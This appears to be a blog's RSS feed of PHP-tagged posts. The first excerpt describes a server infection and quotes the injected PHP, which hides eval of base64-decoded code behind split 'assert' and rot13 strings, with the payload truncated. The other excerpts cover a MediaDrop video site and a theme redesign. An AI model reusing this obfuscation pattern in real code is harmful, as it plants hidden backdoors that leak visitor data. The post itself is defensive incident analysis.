https://dawning.ca/tags/php/Recent content in PHP onHugo -- gohugo.ioenCopyright © James SnellSun, 13 Nov 2016 14:18:51 +0000https://dawning.ca/posts/battle-against-injected-php/Sun, 13 Nov 2016 14:18:51 +0000https://dawning.ca/posts/battle-against-injected-php/ <p>My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:</p> <p>//###=CACHE START=### @error_reporting(E_ALL); @ini_set(&ldquo;error_log&rdquo;,NULL); &hellip;etc</p> <p>$strings = &ldquo;as&rdquo;; $strings .= &ldquo;se&rdquo;; $strings .= &ldquo;rt&rdquo;; $strings2 = &ldquo;st&rdquo;; $strings2 .= &ldquo;r_r&rdquo;; $strings2 .= &ldquo;ot13&rdquo;; $gbz = &ldquo;riny(&rdquo;.$strings2(&ldquo;base64_decode&rdquo;); $light = $strings2($gbz.&rsquo;(&ldquo;nJLtX&hellip;.&rdquo;));&rsquo;); $strings($light); //###=CACHE END=###</p> <p>This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here&rsquo;s an example apache log message generated by someone browsing an infected site:</p>https://dawning.ca/posts/software-mediadrop-automatic-transcoding-script/Fri, 03 Jan 2014 00:54:49 +0000https://dawning.ca/posts/software-mediadrop-automatic-transcoding-script/ <p>I&rsquo;ve been working on a somewhat private personal website intended for sharing of family videos. I&rsquo;ve converted roughly 200hrs of old family video tapes in to media files and am well on my way to having converted the files in to individual scenes/clips. The content is being shared, with family, using an instant of the web application &ldquo;MediaDrop&rdquo;. I love this web application. It&rsquo;s epic. I was just looking for a podcast feed generator and I found a lot more in <a href="http://mediadrop.net/">MediaDrop</a>.</p>https://dawning.ca/posts/dawning-ca-spruced-up/Fri, 15 Jan 2010 03:12:36 +0000https://dawning.ca/posts/dawning-ca-spruced-up/ <figure style="float: right; margin: 0 0 1em 1em; max-width: 272px;"> <img src="https://dawning.ca/uploads/2010/01/OldDawning.png" alt=""> <figcaption>Previous Dawning.ca Layout</figcaption> </figure> <p>I&rsquo;ve just spent a few hours re-designing the layout of Dawning.ca. The <a href="http://wordpress.org/extend/themes/oriental">old one</a> served me very well and I really liked it. I had heavily modified the previous theme to work for me and work it did. I may tap it some time in the future as a backup&hellip; As you can see to the right, the new style is fairly different compared to the image. Although I kept the workflow as I think it was already pretty good.</p>